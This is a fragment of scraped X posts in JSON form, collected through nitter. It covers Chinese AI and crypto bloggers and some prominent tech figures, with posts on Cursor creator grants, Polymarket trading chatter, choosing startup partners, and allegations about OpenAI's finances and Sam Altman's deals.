AI 博主,专研深度学习、NVIDIA 生态与 ComfyUI 工作流,并运营着免费的技术学习社群。\n\n这批博主横跨了 AI 编程、比特币生态、SaaS 出海以及深度技术钻研等多个细分赛道,关注他们,往往能捕获到行业最前线的风向。", + "url": "https://x.com/Pluvio9yte/status/2049042369530777747", + "published_at": "2026-04-28T08:25:44+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "《Cursor 官方扶持的 AI & Web3 创作者名录》\n\n@cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。\n\n以下是这 15 位获得资助的创作者及其核心画像(顺序随机):\n\n1. Jason Zhu @GoSailGlobal 独立开发者,主要分享 SaaS 出海经验与 AI 资讯,并搭建了一个聚合各类 Agent 技能的资源站点。\n\n2. 0xAA @0xAA_Science 毕业于北大计算机系,博士学历,同时也是 Web3 开源教育平台 WTF Academy 的发起人。\n\n3. 泊舟 @bozhou_ai 拥有 2.1 万粉丝的 AI 博主,既是 AI 程序员也是氛围编程的践行者,重点构建各类智能体与提示词方案。\n\n初夏 @chuxiaeth 这里斗胆把我也加入,一个努力学习AI的小卡拉米。\n\n4. Ding @dingyi 产品设计师出身,掌管着 SaasPick、TopFeed 等多个独立产品,全网积累了约 15 万的关注者。\n\n5. 雪踏乌云 @Pluvio9yte 供职于大厂的开发者,主要输出氛围编程、AI 编程技巧以及产品出海方面的实操经验。\n\n6. 奶昔 @realNyarime Naixi Networks 的创办者,核心精力聚焦在 eSIM 技术与奶昔社区的运营上。\n\n7. 杀破狼 @wolfyxbt 深耕 Meme 币赛道,热衷于氛围编程与链上数据拆解,表达方式风趣且一针见血。\n\n8. 凡人小北 @frxiaobei 身兼商业与战略顾问,致力于 AI 战略咨询,长期扎根在真实商业场景中推动 AIGC 项目的落地应用。\n\n9. Leo @runes_leo AI 与 Crypto 的独立建设者,符文堂社区的发起人,深入钻研比特币生态体系与链上量化策略。\n\n10. 铁锤人 @lxfater AI 领域博主,善于借助 AI 赋能创业历程,在 GitHub 上维护着一个斩获 3 万星标的热门项目。\n\n11. 比特币橙子 @oranges 资深比特币玩家与加密投资人,对 AI 和氛围编程抱有极高热情,亲手搭建了集成多种 AI 智能体的工具集 OwlClawHub。\n\n12. Steven Lynn @Stv_Lynn 既是科技播客 FirstLabAI 的主持人,也是线下活动 Crazy Saturday 的发起与主办者。\n\n13. Berryxia @berryxia 热衷于打造各类 AI 工具并精研系统级提示词,对设计美学与提示词分享抱有极大热忱。\n\n14. 余温 @gkxspace 05 年出生的连续创业者,年纪虽轻但经验丰富,专注于 AI 产品从 0 到 1 的商业化打造,已有项目营收突破七位数。\n\n15. CuiMao @CuiMao 偏重开发实战的 AI 博主,专研深度学习、NVIDIA 生态与 ComfyUI 工作流,并运营着免费的技术学习社群。\n\n这批博主横跨了 AI 编程、比特币生态、SaaS 出海以及深度技术钻研等多个细分赛道,关注他们,往往能捕获到行业最前线的风向。", + "url": "https://x.com/chuxiaeth/status/2049042369530777747", + "published_at": "2026-04-28T08:25:44+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "五一节快到了,听说N卡上网最快了", + "url": "https://x.com/realNyarime/status/2049040750860812765", + "published_at": "2026-04-28T08:19:18+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Leo Labs 大群 4-28 群友讨论精华(最近 584 条)\n\nV2 cutover 5 小时后正式生效,群里这一天聊到的 4 件事记下来。\n\n━━━━━━━━━━━━\n\n1️⃣ V2 EOA 已实测可跑,但 redeem 路径有坑\n\n• 4/27 上午有人 EOA 实盘 4h ≈ $20(V2 endpoint 已下单成功)\n• redeem 回来是 USDC.e,不是 pUSD,要交易得再 warp 一次\n• Gnosis Safe / 邮箱注册号 当前都没支持,等官方上线\n• pUSD 4/28 早晨试下单\"无对手盘 / 无 orderbook\",正式 19:00 后才完整上线\n\n💡 EOA 已可上车,其他钱包等今晚\n\n━━━━━━━━━━━━\n\n2️⃣ cutover 前夜事故潮(4/28 早晨集中爆发)\n\n• 多人 bot 全停:\"亏损次数和程度都远超正常值\"\n• 异常价格:进场 68¢ 瞬间砸到 6¢ 又恢复 68¢\n• clob 撮合常给 2-3 秒才成交(撤单攻击窗口)\n• 群友共识:\"今天升级前后市场必然很乱,先停下来等等看\"\n• 反共识:\"越乱越赚钱,乱就停就一辈子亏钱\"\n\n💡 时间换数据 vs 数据换时间,你站哪边\n\n━━━━━━━━━━━━\n\n3️⃣ V2 后加密手续费 ≈ 业内最高\n\n群里跨平台费率扒了一遍:\n• Binance 合约:万分之一(含 BNB 折扣到万分之几)\n• Deribit 短期期权:万三 → 等效 1% 购买金额\n• 正规博彩奖池:95%+\n• PM V2 加密:高频 maker/taker 都没法承受新费率\n\n群里多数派:\"机器人集体退出加密板块,体育板块手续费低 + 不卡资金 + 全球年赌球资金万亿规模\"\n\n💡 V2 后加密 alpha 可能搬家了\n\n━━━━━━━━━━━━\n\n4️⃣ $1M 流动性奖励规则(前 2h $500K)\n\n• 入口:PM 网页 → 头像 → rewards\n• 规则:在指定市场 range 内挂 limit order 就有奖励,yes no 都挂,没成交也有\n• 量级测算:PM 日均 2.5 亿成交,1h ≈ 2000 万,$500K ≈ 2-2.5%\n• 风险:撤单不及时仍会被逆向\n\n💡 前 2h 黄金 slot 比当日剩余时段高密度 2x\n\n━━━━━━━━━━━━\n\n📌 今日 3 个值得记下来的点\n\n1. EOA V2 已通,但 USDC.e ↔ pUSD 来回 warp 是新成本项\n2. V2 加密手续费 ≈ 行业最高,体育板块成 alpha 主战场候选\n3. $1M 池前 2h 是黄金 slot — 测算占 PM 日成交 2-2.5%\n\n---\n\n每天我会把 Leo Labs 大群的群友讨论精华整理成日报,发在频道里。\n\n💬 大群 http://t.me/runesgang\n📡 每日精华频道 http://t.me/runesgangalpha\n🔗 想自己扒数据研究地址 → http://polymarket.com/?r=tgpublic&via=runes-leo&utm_source=x&utm_content=group-digest-4-28&v…", + "url": "https://x.com/runes_leo/status/2049039917494231397", + "published_at": "2026-04-28T08:16:00+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "memos确实是在记忆里面做的很不错的,自己做的Agent也可以接入一下他们的", + "url": "https://x.com/bozhou_ai/status/2049033808629129504", + "published_at": "2026-04-28T07:51:43+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "听我一句劝,不要接触 .NET。\n不要什么都想学,不要觉得 AI 牛逼了,自己就也牛逼起来了。\n有些技术不是用来学习的,是用来渡劫的。\n不要接触 .NET,人生会变得不幸。", + "url": "https://x.com/CuiMao/status/2049032868610072772", + "published_at": "2026-04-28T07:47:59+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "昨天试了下快乐🐎,早上起来一看欠费了, 我是韭菜我自豪。😎😎😎", + "url": "https://x.com/CuiMao/status/2049029664639979624", + "published_at": "2026-04-28T07:35:15+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "说得太对了👍,牛逼", + "url": "https://x.com/lxfater/status/2049026986442707117", + "published_at": "2026-04-28T07:24:37+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "找合伙人,先看家室\n\n我知道这个标题会得罪一大堆人。\n\n但我还是要说。\n\n因为这个坑我自己踩过,而且踩得很深,深到现在回想起来还会觉得胸口闷一下。\n\n事情是这样的。去年我找合伙人,找到一个我觉得各方面都很合适的人。能力没问题,聊起来也很投机,对方向的判断跟我高度一致。我当时觉得,就是他了。\n\n然后我就开始掏心掏肺。\n\n我是那种一旦认定了合伙人,就会把底牌全部摊开的人。资源、人脉、我对未来的规划、我手上的牌,全部给你看。因为我觉得合伙人之间如果还藏着掖着,那这个事儿没法做。\n\n对方也表现得很好。我们配合得挺顺畅,我一度觉得这就是我找到的「对的人」。\n\n直到竞争对手出现了。\n\n对方那边也开始对他好。也掏心掏肺,也给资源,也画未来。\n\n然后我发现了一个让我非常懵的事情。\n\n他开始保持中立了。\n\n不是说他背叛了我,没有那么戏剧化。就是。。。他觉得那边也挺好的,两边都不想得罪,两边都想保持关系,两边都不想做选择。\n\n我当时的感受,怎么说呢,不是愤怒。是一种很深的困惑。\n\n我掏心掏肺对你,你转头就觉得另一个掏心掏肺的人也很好?那我算什么?\n\n后来我花了很长时间去想这件事。不是想他这个人有多坏,他可能真的不觉得自己做错了什么。而是想,为什么会这样。\n\n我回头去看他的背景,发现了一些之前没注意到的东西。\n\n他没有家室。没有结婚,没有小孩。这个本身不是问题,很多优秀的人在事业上升期选择不成家,完全可以理解。\n\n但关键是,他的原生家庭也有问题。不是那种「父母离婚」就完事了的问题,是那种从小就没有在一段稳定的、被无条件信任的关系里待过的问题。\n\n我不是心理学专家,但我后来想明白了一件事。\n\n一个从来没有体验过「被无条件信任」的人,他很难理解「忠诚」这两个字到底意味着什么。\n\n不是他不想忠诚。是他的经验里没有这个模型。\n\n你对他好,他觉得好。别人对他好,他也觉得好。他会本能地在所有对他好的人之间保持平衡,因为在他的成长经历里,没有哪段关系是绝对安全的、绝对不会变的。所以他学会的生存策略就是,不把鸡蛋放在一个篮子里。\n\n不全心投入任何一段关系。\n\n这个策略在他个人生活里可能是有效的。但在创业里,这是致命的。\n\n创业合伙人之间的信任,是一种非常特殊的信任。它不像朋友之间,各过各的,偶尔见面吃个饭。它是每天都要一起做决策,一起扛压力,一起面对那些让人睡不着觉的问题。\n\n这种关系需要一个前提,就是我们都确认,我们在同一条船上,不会跳船。\n\n如果你的合伙人随时可能因为别人的示好而动摇,那这条船等于没有底。\n\n说到这里我想补一句,这个观点听着很容易被误解,好像我在歧视没结婚的人或者原生家庭不好的人。\n\n不是这样的。\n\n我说的不是「没有家室的人都不靠谱」。我认识很多没有家室但极其有原则有担当的人。\n\n我说的是一个特定的组合,没有家室,同时原生家庭也存在严重问题。\n\n这两个条件叠在一起的时候,这个人大概率从来没有在任何一段关系里,真正体验过什么叫「我为你兜底,你也为我兜底」。\n\n他可能很聪明,很有能力,甚至人品也不坏。但他缺少一种东西。\n\n承诺感。\n\n就是那种「我说了跟你干,哪怕天塌下来我也跟你干」的感觉。\n\n这玩意不是靠道德教育来的,也不是靠画饼画出来的。它是在长期的、稳定的、互相兜底的亲密关系里慢慢长出来的。\n\n家庭,尤其是自己建立的家庭,是大多数人一生中第一次真正体验「无条件承诺」的地方。你有了老婆孩子,你就知道什么叫不能跑。不是不想跑,是有人在等你回家。\n\n这种体验会重塑一个人对「责任」这个词的理解。\n\n我现在的合伙人,有家室,有小孩。\n\n我能感觉到一个很明显的区别。他做决策的时候,底色是稳的。不是因为他比别人更聪明,是因为他知道自己要为谁负责。这让他天然就会过滤掉那些不靠谱的选项。\n\n遇到困难的时候他不会情绪化,因为他在家里已经练了无数遍「事情很糟但我不能崩」这个技能。有小孩的人都知道,半夜两点孩子发烧你困得不行但你还是得爬起来去医院,这种事情经历多了之后,你对压力的耐受度会提高很多。\n\n我不是说有家室就一定靠谱。有些有家室的人混蛋得很,另一回事。\n\n但至少,有家室给了你一个可以观察的窗口。你可以旁敲侧击地了解,他跟老婆的关系怎么样,他怎么对待自己的小孩,他在家庭里是不是一个愿意扛事的人。\n\n这些信息能帮你判断他在创业的极端压力下会怎么表现。\n\n而一个没有家室、原生家庭也有问题的人,你能观察的窗口很少。他的所有关系都是「可选的」,都是「可以随时退出的」。你很难知道他在一段不能退出的关系里会怎么表现。\n\n因为他可能从来没有过这种关系。\n\n写到这里,突然想到一个比喻。\n\n创业合伙人的关系,其实很像一场婚姻。你们要一起做最重要的决策,一起分最大的利益,也一起扛最重的风险。你们吵架的频率可能比跟老婆吵架还高。你们分手的代价可能比离婚还大。\n\n既然是一场婚姻,那你在「结婚」之前,是不是应该了解一下对方在亲密关系里的表现?\n\n而一个人在亲密关系里的表现,最直接的参考就是他现有的亲密关系。\n\n他的家庭。\n\n如果他没有,而且从小也没有过一个好的范本。\n\n那你就是在跟一个从来没谈过恋爱的人结婚。\n\n可能很好。但风险很大。\n\n在创业这件事上,我个人的选择是,不赌这个概率。\n\n我知道这个标准很苛刻,甚至有点不公平。有些人原生家庭不好,但通过自己的努力修复了自己,变成了一个非常靠谱的人。这样的人存在,而且值得尊敬。\n\n但我必须坦诚地说,在创业找合伙人这个场景下,我没有时间和精力去一一鉴别。\n\n创业的每一天都在烧钱,烧时间,烧精力。你选错一个合伙人,浪费的可能是一两年的时间和几十万上百万的钱。\n\n在这种赌注面前,我选择用一个粗暴但有效的筛选标准来降低风险。\n\n有家室,旁敲侧击确认有责任感。可以聊。\n\n没有家室,但原生家庭健康稳定,成长过程中有过被信任和信任别人的经验。也可以聊。\n\n没有家室,原生家庭也有问题。放弃。\n\n这话说出来很残忍。但创业本身就是一件残忍的事情。你不对合伙人残忍,市场就会对你残忍。\n\n我之前那次经历,到最后不是撕破脸散的,是我主动退了一步,把关系降级成了普通朋友。没有冲突,没有指责,就是安静地把利益切清楚,各走各的。\n\n但那种失去一个你以为可以并肩作战的人的感觉,真的很难受。\n\n就像你以为找到了战友,结果发现他只是一个路过的旅客。他在你这里停一停,在别人那里也停一停,谁给的风景好就多待一会儿。\n\n他没有恶意。\n\n但他不会为你拼命。\n\n而创业,是需要有人为你拼命的。\n\n你也需要为别人拼命。\n\n这种拼命的前提,是你们都知道,除了这条路,没有别的路。\n\n我觉得这件事跟乔布斯说过的那句话有点像,\n\nstay hungry, stay foolish。我再加一句,stay committed。\n\n保持饥饿,保持愚蠢,保持承诺。\n\n三个里面,最难的是最后一个。", + "url": "https://x.com/Pluvio9yte/status/2049026972337197330", + "published_at": "2026-04-28T07:24:33+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Overheard in Silicon Valley: “Alexander wept, for there were no more situations left to monitor.” cc @MTSlive", + "url": "https://x.com/pmarca/status/2049022953031950466", + "published_at": "2026-04-28T07:08:35+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "x.com/i/article/204902020458…", + "url": "https://x.com/bozhou_ai/status/2049021892208521544", + "published_at": "2026-04-28T07:04:22+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "RT by @Pluvio9yte: x.com/i/article/204902020458…", + "url": "https://x.com/Pluvio9yte/status/2049021892208521544", + "published_at": "2026-04-28T07:04:22+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "大模型还有擂台赛的😂😂😂", + "url": "https://x.com/Pluvio9yte/status/2049021288069599538", + "published_at": "2026-04-28T07:01:58+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "MemOS 是所有记忆系统中我用到的最好的,我前几天发现新添加了记忆可视化插件的内容,然后就安装体验了\n\n原来我们可能好奇到底OpenClaw Hermes此类的Agent到底记住了什么,现在在可视化插件的帮助下,我们终于能够看见了他们记忆的内容。", + "url": "https://x.com/Pluvio9yte/status/2049021003540598840", + "published_at": "2026-04-28T07:00:50+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "x.com/i/article/204900159355…", + "url": "https://x.com/Pluvio9yte/status/2049020395874075090", + "published_at": "2026-04-28T06:58:25+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "x.com/i/article/204837140806…", + "url": "https://x.com/lxfater/status/2049019768456241273", + "published_at": "2026-04-28T06:55:56+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "谷歌反重力家庭组不能一拖多,改成跟号主共享额度,看来Google Antigravity也被薅怕了", + "url": "https://x.com/realNyarime/status/2049019755336704210", + "published_at": "2026-04-28T06:55:53+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "RT by @Pluvio9yte: 介绍下我自己,我是互联网大厂的在职算法工程师,在X上公开分享我学习AI、构建产品和第二收入曲线的过程。\n\n公众号:柯基的思考笔记 \n\n下面是一些我搭建的,可能对你有用的东西:\n\n1. 一个每日AI新闻skill,follow 1000+信息源,结合你的个人需求进行定制摘要\n介绍:https://x.com/Keji715/status/2048399133954675034\n源代码:https://github.com/lovekeji-ai/ai-news-keji\n\n2. 一个可以通过applewatch 随时随地记录灵感的工作流\n\n介绍:https://x.com/Keji715/status/2028802127108165685\n\n源代码:https://github.com/lovekeji-ai/listen_watch\n\n3. AI私人跑步教练\n\n介绍:https://x.com/Keji715/status/2034231149451411585\n\n源代码:开源计划中", + "url": "https://x.com/Pluvio9yte/status/2049018122737213860", + "published_at": "2026-04-28T06:49:24+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "R to @runes_leo: youtube.com/watch?v=6eBSHbLK…", + "url": "https://x.com/runes_leo/status/2049015605710491995", + "published_at": "2026-04-28T06:39:23+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "最近 X 上无数次刷到 @bcherny (Claude Code 作者)的演讲《Mastering Claude Code in 30 minutes》(30 分钟用好 Claude Code)——溯源才发现,其实是一年前的内容。\n\n两点感受:\n- 好内容生命力是真长,一年了依然有这种传播力\n- 大家对\"怎么用好 AI\"的方法论焦虑,在数据上肉眼可见\n\n前两天我专门做了个中文字幕版,有需要的可以看看,重温一下👇\n\n这个视频来自 Anthropic 一年一度的 Code with Claude 大会,5 月初 2026 届就要开了,新内容出来我会再更新一版最新的,关注不错过👀", + "url": "https://x.com/runes_leo/status/2049015602073989130", + "published_at": "2026-04-28T06:39:23+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The cracks inside OpenAI are deepening, and the numbers don’t lie.\n\nWhen your own CFO is sounding the alarm, something is seriously wrong.\n\nCheck this out:\n\n1: OpenAI missed its target of 1 billion weekly active users, and missed multiple monthly revenue targets earlier this year, per WSJ\n\n2: ChatGPT’s share of generative AI web traffic collapsed from 86.7% to 64.5% in just 12 months, while Google’s Gemini surged from 5.7% to 21.5%\n\n3: CFO Sarah Friar has privately warned colleagues that OpenAI may not be able to pay for future computing contracts if revenue doesn’t accelerate, and has been excluded from key infrastructure meetings by Altman as a result\n\n4: Friar is also pushing back on Altman’s aggressive IPO timeline, saying the company is not organisationally ready to meet public company reporting standards\n\n5: OpenAI has committed to roughly $600 billion in future data center spending, projections show the company could burn $200 billion before reaching steady cash flow, even after raising $122 billion in the largest funding round in Silicon Valley history\n\n6: Altman’s own board is now questioning his spending decisions, and court proceedings in Musk’s lawsuit to oust Altman and unwind OpenAI’s for-profit conversion have just begun\n\nThe biggest AI company in the world is valued at $852 billion, and its own CFO isn’t sure it can pay its bills.\n\nOpenAI is the biggest retail trap of the last decade.\n\nIf you want to know where we’re deploying capital next, follow us with notifications on.\n\nMany people will wish they followed sooner.", + "url": "https://x.com/GaryMarcus/status/2049012041164185701", + "published_at": "2026-04-28T06:25:14+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "💯", + "url": "https://x.com/elonmusk/status/2049010754012209457", + "published_at": "2026-04-28T06:20:07+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "R to @lxfater: 来源:\n\n[1]https://www.businesstoday.in/technology/story/sam-altmans-outside-bets-raise-fresh-conflict-questions-as-openai-nears-ipo-526161-2026-04-17\n[2] https://thenextweb.com/news/openai-is-in-talks-to-buy-fusion-energy-from-helion\n[3] https://www.cnbc.com/2026/02/25/thrive-capital-openai-joshua-kushner.html\n[4] https://slguardian.org/conflict-of-interest-storm-engulfs-openai-as-sam-altmans-private-deals-face-scrutiny/\n[5] https://techcentral.co.za/greg-brockmans-diary-takes-centre-stage-in-musk-vs-openai/280684/\n[6] https://x.com/elonmusk/status/2048801964457140540(Musk 原推:「Scam got dozens of OpenAI side deals with a piece of the action for himself, Y Combinator style」)", + "url": "https://x.com/lxfater/status/2049009528595685705", + "published_at": "2026-04-28T06:15:15+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Sam Altman 最聪明的地方,不是把 AI 做起来,是这套给自己捞钱的手法\n\n2015 年,OpenAI 打着非营利的旗号成立\n顶级研究员冲着使命感来,不要钱只要理想\nMusk 看到了,砸了 3800 万进去\n监管也没把它当商业公司盯\n\n连 Musk 这种人都信了\n\n但 CEO 在想另一件事\n\nAltman 从 2014 年开始,在核聚变公司 Helion 买了股\n2021 年一口气砸进去 3.75 亿美元,这是他个人最大的一笔押注 [1]\n\n然后他提议,让 OpenAI 向 Helion 投 5 亿美元\n这 5 亿进去,Helion 估值直接涨 6 倍,他自己的股份跟着涨 [1]\n\nOpenAI 内部的人看出问题了\n员工觉得 Helion 的技术根本没到那个阶段,而且 CEO 这么做,明摆着是用公司的钱给自己的投资抬价\n董事会拒绝了 [1]\n\n看起来,这件事到这里结束了\n\n但 Altman 还有一招\n\n他让 OpenAI 跟 Helion 签了一份购电协议\n2035 年前买 Helion 的 50 吉瓦电力\n就是说,OpenAI 承诺未来要用 Helion 的电\n那些电,现在还没发出来 [2]\n\nHelion 拿着这份协议去融资,融到了 2.5 亿美元,估值 150 亿\n领投的 Thrive Capital 跟 Altman 关系很深,同时也是 OpenAI 的投资人,往里投了超过 10 亿美元 [3]\n\n股权投资被拒了\n他换了个形式,把同样的事做完了\n\nMusk 把这套操作叫做 Y Combinator 风格 [6]\n就是 YC 那套圈内玩法:互相投资、互相背书,写进合同结构里,外人看全是正常生意\n\nAltman 就是从 YC 出来的\n\nMusk 说,Altman 用这套方式给自己安排了几十笔交易\n(这是 Musk 的指控,庭审还在进行,法庭没有裁定)[6]\n\n但 2023 年 11 月,董事会把 Altman 踢走的时候说的是:\n\n他投了什么公司,我们根本不知道 [4]\n\n不是没想查,是这个结构本来就看不出来\n非营利机构没有上市公司那套强制披露,CEO 替 OpenAI 谈的每笔交易,到底是为公司还是为自己,没人能判断\n\n今天,Musk 的庭审正式开始\nBrockman 的日记、Helion 这条线、整套结构,第一次摆到台面上 [5]\n\nMusk 能不能赢不好说\n\n但那套结构,还在别的地方跑着", + "url": "https://x.com/lxfater/status/2049009402372313341", + "published_at": "2026-04-28T06:14:44+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "R to @runes_leo: 第4章:跑了几个月策略,回头对 PnL 报表觉得不对劲。\n\n拉链上记账对账了一下,发现 18.3% 的成交根本没进 DB。\n\n亏的钱是真亏,但赚的那部分里有一截根本没发生过——我自己的报表在骗自己。\n\n要不要也拉一遍你自己的对账?\nhttps://x.com/runes_leo/status/2049004801078300881?s=20\n———\n\n付费连载 7 章里的第 4 章。链接里有完整版 + 源码包 + 读者群,订阅 X 也可以持续追读。\n\nhttps://leolabs.me/pm-quant#/pm-quant", + "url": "https://x.com/runes_leo/status/2049006099173626041", + "published_at": "2026-04-28T06:01:37+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "R to @realNyarime: 随行WiFiX配置的聚合频宽是100+100+100+90,虽然北京地铁配置的是100+60+100+60", + "url": "https://x.com/realNyarime/status/2049005476243993029", + "published_at": "2026-04-28T05:59:08+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "跑了几个月策略,回头对 PnL 报表觉得不对劲。\n\n拉链上记账对账了一下,发现 18.3% 的成交根本没进 DB。\n\n亏的钱是真亏,但赚的那部分里有一截根本没发生过——我自己的报表在骗自己。\n\n要不要也拉一遍你自己的对账?\n\n———\n\n付费连载 7 章里的第 4 章。链接里有完整版 + 源码包 + 读者群,订阅 X 也可以持续追读。\n\nhttps://leolabs.me/pm-quant#/pm-quant", + "url": "https://x.com/runes_leo/status/2049005119069667522", + "published_at": "2026-04-28T05:57:43+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "It’s a mystery. We’ll never know.", + "url": "https://x.com/pmarca/status/2049001817015529591", + "published_at": "2026-04-28T05:44:36+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "GPT-5.5 在 Code Arena 排第 9\n\n难道是 OpenAI 编程这块掉队了?\n\n但 Arena 自己的统计负责人,几小时后发了条澄清\n\n这榜单,当前只测前端或者说Web DEV\n\nGPT-5.5全栈和 GitHub 集成,还要几个月才上,所以现在这方面很弱。\n\n所以不是它编码不行,是它前端这块比 Claude 弱\n\nCode Arena,Code范围仅仅前端也太不合理了吧", + "url": "https://x.com/lxfater/status/2049001091916783635", + "published_at": "2026-04-28T05:41:43+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Actual anti-AI energy is the newest instance of @robkhenderson’s “luxury beliefs” — a small fringe of elites playing at radical politics. For normal people, AI is a useful app on their phone, and they’ll just use it more and more.", + "url": "https://x.com/pmarca/status/2049001003823829379", + "published_at": "2026-04-28T05:41:22+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "青椒肉丝饭 + 老盐百香果 6u", + "url": "https://x.com/0xAA_Science/status/2049000780519321906", + "published_at": "2026-04-28T05:40:29+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "RT by @Pluvio9yte: 从去年7月份到现在,一路从 Web 排版工具,到 API 服务,再到公众号创作 CLI。\n\n我自己开发者也是创作者,这个产品会尽力保证每个月迭代1次+。\n\n简单说一下目前公众号创作 CLI 支持哪些模式?\n\nAI 模式(免费):生成排版 prompt,由你的 Claude / Codex 继续处理,3 个基础主题,动手能力强的自由定制。\n\nAPI 模式(专业服务):秒级响应,40+ 主题,43 个高级排版模块,确定性输出,团队协作与自动化发布首选。\n\n如果觉得好用,帮忙给个 Star \n\nhttps://github.com/geekjourneyx/md2wechat-skill/", + "url": "https://x.com/Pluvio9yte/status/2048999532768190606", + "published_at": "2026-04-28T05:35:31+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "It won’t happen. People say all kinds of things in surveys. Watch what they do instead. And what they do is… use AI.", + "url": "https://x.com/pmarca/status/2048998808143425821", + "published_at": "2026-04-28T05:32:39+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "华为随身WiFi X目前只有移动版,机卡绑定、白名单机制仅识别移动卡,物联网卡和其他运营商都用不了\n另外直播神器号卡「移动直播臻享卡」只能在这台随身WiFi上用,具体套餐及机制可参考博主「小武是我」发布的视频\n\n感谢通信人家园「玩耍天使」提供的测试数据,在北京地铁12号线实测79C+41C 4cc载波聚合 ,或许华为定高价是为了给友商活路", + "url": "https://x.com/realNyarime/status/2048998165031043180", + "published_at": "2026-04-28T05:30:05+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: Don't just reset Codex rate limits for fun, it costs money.\nDon't just reset Codex rate limits for fun, it costs money.\n\n... but the vibes are good ...\n\nI have reset Codex rate limits for ALL paid plans to celebrate a good week and allow everyone to build more with GPT-5.5. Enjoy", + "url": "https://x.com/sama/status/2048997818673537399", + "published_at": "2026-04-28T05:28:43+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: To those who pit Sam Altman and Elon Musk against each other like a billionaire feud, look, do your own research. \n\nWhen have you ever seen Elon Musk use his money to buy a yacht, a paradise island, or engage in extravagant spending? \nEven the money from this lawsuit, if he wins, will be donated to charity.\n\n On the other hand, why did Sam Altman change the bylaws of OpenAI, which was a non-profit organization? Why is everything opaque at OpenAI? Who benefits from the money? \n\nTo all the skeptics, do your own research. I have no doubt about your conclusions if you seek the truth. \n\nOn one side, there is a man who dedicates his life to the well-being of humanity, and on the other, a man who seeks profit, even at the risk of endangering humanity.\n\nElon Musk must win.", + "url": "https://x.com/elonmusk/status/2048992619926106526", + "published_at": "2026-04-28T05:08:03+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "之前闲鱼95折收的号内E卡,帮我代下单。昨天派出所给我打电话,让我今天去做笔录,还问我买的东西在不在,是不是想让我退赃\n\n于是早上8点到就到派出所做笔录,花了2个小时。和民警了解到,受害人是被骗了10多万的大润发卡,10500的京东E卡,京东E卡分别给10来个人下单,我是其中一个\n笔录上把我当成刑事案件的证人,写了我买E卡的过程,提供了卖E卡人的相关信息\n\n涉案的E卡,和我有关的只有1700多元,还好。主要1月份到现在向这个人买了大几万的E卡,希望后续不要再遇到了,果然贪小便宜吃大亏", + "url": 